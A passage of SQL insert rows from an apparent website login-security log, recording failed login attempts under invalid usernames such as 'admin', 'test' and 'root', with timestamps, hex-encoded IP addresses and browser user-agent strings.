(361, 4047, 1591655188.865362, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(362, 4050, 1591676429.001878, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46e, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(363, 4051, 1591685869.926558, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5b79b70f, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(364, 4055, 1591724530.816781, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc61b507b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.80 Safari/537.36'),
(365, 4056, 1591727021.328372, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46a, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(366, 4081, 1591830106.600512, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5d716f64, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(367, 4086, 1591835017.422484, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff6883445c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(368, 4092, 1591851897.760809, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff05b6d2e4, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(369, 4095, 1591855198.796572, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff9f5930ed, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(370, 4100, 1591859288.000362, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffae8a0163, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(371, 4102, 1591860690.208771, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff332645e3, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(372, 4108, 1591865189.251523, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68f8e07c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(373, 4112, 1591869789.915835, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff505a5246, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(374, 4115, 1591871929.739222, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e819195, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(375, 4118, 1591881529.260336, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a465, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(376, 4122, 1591916910.123041, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb4f51b44, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(377, 4148, 1592132533.650071, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(378, 4204, 1592303081.322665, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8b3b2bc4, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(379, 4206, 1592303892.084261, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68ee5e3c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(380, 4207, 1592304432.229314, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb23e12b9, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(381, 4209, 1592305222.486185, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff74cb4bcc, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(382, 4248, 1592538763.765539, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff1fdc0029, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(383, 4264, 1592685012.294765, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff33c3a6ab, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(384, 4267, 1592715511.401334, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc6623cf2, 'Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(385, 4271, 1592742238.776012, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23e42e6f, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(386, 4306, 1592840473.679554, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff45c583c4, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(387, 4310, 1592874264.842117, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9e83481, 'Mozilla/5.0 (iPad; CPU OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1'),
(388, 4312, 1592888540.431256, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(389, 4313, 1592902527.721566, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a462, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(390, 4318, 1592929582.891154, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a468, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(391, 4333, 1592982984.307845, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9560dd5, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(392, 4335, 1592987614.654340, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff252a824a, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(393, 4336, 1592988753.068314, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff71fb828d, 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/29.0.1547.62 Safari/537.36'),
(394, 4337, 1592990605.030748, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffffab06102c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(395, 4343, 1592999824.803968, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff766367a2, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(396, 4349, 1593017114.013702, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffffc918c717, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(397, 4353, 1593032111.160963, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc65a5, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(398, 4356, 1593045626.583116, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff9de6da80, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(399, 4360, 1593053136.378009, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffff3494f637, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(400, 4362, 1593057268.537855, 1, 'loginFailInvalidUsername', 'root', 0, 0x00000000000000000000ffff90d953e1, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(401, 4369, 1593078624.494666, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffffa5e36f27, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(402, 4371, 1593093326.569488, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46f, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(403, 4375, 1593125727.600751, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff8b3b8840, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(404, 4376, 1593130115.125328, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff9fcb2047, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(405, 4378, 1593140339.310400, 1, 'loginFailInvalidUsername', 'q', 0, 0x00000000000000000000ffff9f59ae66, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(406, 4395, 1593230380.636285, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb977510b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(407, 4398, 1593245944.882381, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2d0994bc, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(408, 4425, 1593443583.790869, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc658c, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(409, 4445, 1593603123.814868, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc65c1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.12; rv:61.0) Gecko/20100101 Firefox/61.0'),
(410, 4446, 1593603904.818642, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb9dc6522, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(411, 4453, 1593649452.571790, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffbe4e8b6d, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:63.0) Gecko/20100101 Firefox/63.0'),
(412, 4471, 1593797078.838271, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffc7f9e677, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(413, 4473, 1593799012.048464, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffc7f9e677, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/69.0.3497.100 Safari/537.36'),
(414, 4482, 1593887801.746512, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(415, 4486, 1593902978.325731, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb90a4439, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),
(416, 4487, 1593906122.007449, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a464, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(417, 4500, 1594023395.220106, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(418, 4501, 1594027496.564052, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff68f89944, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),
(419, 4505, 1594080603.167622, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb9dc65d1, 'Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko'),
(420, 4515, 1594138759.318284, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955efc3, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(421, 4519, 1594175880.825108, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffc7f9e6b7, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(422, 4532, 1594257684.518264, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23cc4c4a, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.2 Safari/605.1.15'),
(423, 4536, 1594291265.049847, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a46d, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(424, 4541, 1594312313.506851, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff55f8e3a4, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(425, 4549, 1594358229.303865, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb9dc65c9, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(426, 4549, 1594358229.382413, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb9dc65c9, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(427, 4552, 1594375297.574636, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb977510b, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(428, 4565, 1594439579.613674, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff224e277b, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36'),
(429, 4567, 1594448797.676686, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffff33c388be, 'Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:60.0) Gecko/20100101 Firefox/60.0'),
(430, 4571, 1594469232.575950, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff245e67f1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),
(431, 4571, 1594469232.605156, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff245e67f1, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36'),
(432, 4578, 1594509377.100607, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff8e2c8b0c, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),
(433, 4582, 1594539675.842874, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb9dc6607, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:62.0) Gecko/20100101 Firefox/62.0'),
(434, 4592, 1594556272.072185, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff90d953e1, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(435, 4595, 1594567591.598152, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffab06c76c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(436, 4596, 1594568514.371045, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb956a704, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(437, 4597, 1594569385.021909, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff51070e14, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(438, 4598, 1594572697.921649, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff51d7be74, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(439, 4600, 1594575667.991269, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff59d39a6f, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(440, 4602, 1594579764.138468, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff68f8934e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(441, 4604, 1594582215.301989, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffb2803057, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(442, 4605, 1594586420.321940, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff3494f637, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(443, 4606, 1594587666.874621, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffb955bfc9, 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.103 Safari/537.36'),
(444, 4607, 1594587848.634961, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff86d1feba, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(445, 4615, 1594599869.109416, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff86d11e9b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(446, 4624, 1594624060.535988, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff2e65a873, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(447, 4625, 1594625361.726564, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff5d4e3457, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(448, 4632, 1594634150.036975, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffc3ce69d9, 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Safari/605.1.15'),
(449, 4634, 1594648738.048009, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffa5e36f27, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(450, 4638, 1594651368.800968, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffb7504745, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(451, 4648, 1594675425.565888, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff68f8934e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(452, 4654, 1594679900.968361, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff68f8934e, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(453, 4658, 1594684287.538019, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff2e65a873, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(454, 4663, 1594691938.662737, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffab06c76c, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(455, 4665, 1594700200.688848, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff05bc3e93, 'Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36'),
(456, 4667, 1594700305.489800, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff4e2619cc, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(457, 4674, 1594703330.752249, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffa5e36f27, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(458, 4679, 1594706492.502232, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffffb4f4e953, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(459, 4680, 1594707120.216229, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff05bc3e93, 'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36'),
(460, 4687, 1594712191.912341, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff2e65a873, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(461, 4694, 1594718620.380957, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffa516fb79, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(462, 4708, 1594731197.388344, 1, 'loginFailInvalidUsername', 'ze-dent', 0, 0x00000000000000000000ffffb2207c4a, 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134'),
(463, 4710, 1594732551.983684, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff335b7beb, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(464, 4734, 1594754503.584661, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff70c448bc, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(465, 4739, 1594759306.959665, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffffcf9aec61, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(466, 4740, 1594759787.029463, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff2e65a873, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(467, 4746, 1594766965.186850, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff74cef751, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(468, 4748, 1594768012.948346, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff23efbe85, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(469, 4750, 1594770730.105192, 1, 'loginFailInvalidUsername', 'admin', 0, 0x00000000000000000000ffff1f843a33, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(470, 4757, 1594774776.291709, 1, 'loginFailInvalidUsername', 'demo', 0, 0x00000000000000000000ffffb60170e5, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(471, 4761, 1594779082.461729, 1, 'loginFailInvalidUsername', 'demo', 0, 0x00000000000000000000ffff90d953e1, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(472, 4769, 1594785909.862013, 1, 'loginFailInvalidUsername', 'demo', 0, 0x00000000000000000000ffffa5e36f27, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(473, 4773, 1594787912.815553, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffff1f843a33, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(474, 4784, 1594797434.405113, 1, 'loginFailInvalidUsername', 'test', 0, 0x00000000000000000000ffff8b3b8840, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(475, 4796, 1594810455.255946, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff8cee1639, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(476, 4799, 1594813068.366688, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff2e65a873, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(477, 4801, 1594815472.749147, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff86d11e9b, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
(478, 4804, 1594818784.242055, 1, 'loginFailInvalidUsername', '[login]', 0, 0x00000000000000000000ffff669dc8b9, 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),
